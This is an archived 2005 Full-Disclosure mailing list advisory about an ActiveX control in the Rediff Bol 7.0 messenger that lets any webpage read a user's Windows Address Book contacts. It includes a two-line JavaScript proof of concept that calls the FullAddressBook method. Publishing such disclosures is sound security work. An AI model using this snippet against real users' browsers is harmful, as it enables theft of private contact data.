[Full-disclosure] Rediff Bol 7.0 WAB Contacts
From: Gregory R. Panakkal (viper31337_at_yahoo.co.in)
Date: 09/04/05
- Previous message: Willem Koenings: "[Full-disclosure] Re: undetected stuff downloaded by pnp worm"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sun, 4 Sep 2005 08:57:39 +0100 (BST) To: full-disclosure@lists.grok.org.uk
Rediff Bol 7.0 WAB Contacts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected Program : Rediff Bol 7.0
It is a popular instant messenger from Rediff.com
Related URL : http://messenger.rediff.com/newbol/
Discovered by : Gregory R. Panakkal
Vulnerability Description :
Rediff Bol's ActiveX control (Fetch.FetchContact.1 /
Fetch.dll) allows a webpage
to read the user's Windows Address Book (WAB)
contacts. The method "FullAddressBook"
returns the WAB contact list in XML format
Proof Of Concept:
[script]
var Obj = new ActiveXObject("Fetch.FetchContact.1");
alert(Obj.FullAddressBook(0,"","",""));
[/script]
Online Demo:
http://www.infogreg.com/security/im/rediff-bol-7-exposes-wab.html
rgds,
Gregory R. Panakkal
http://www.infogreg.com/
__________________________________________________________
Yahoo! India Matrimony: Find your partner online. Go to http://yahoo.shaadi.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Previous message: Willem Koenings: "[Full-disclosure] Re: undetected stuff downloaded by pnp worm"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
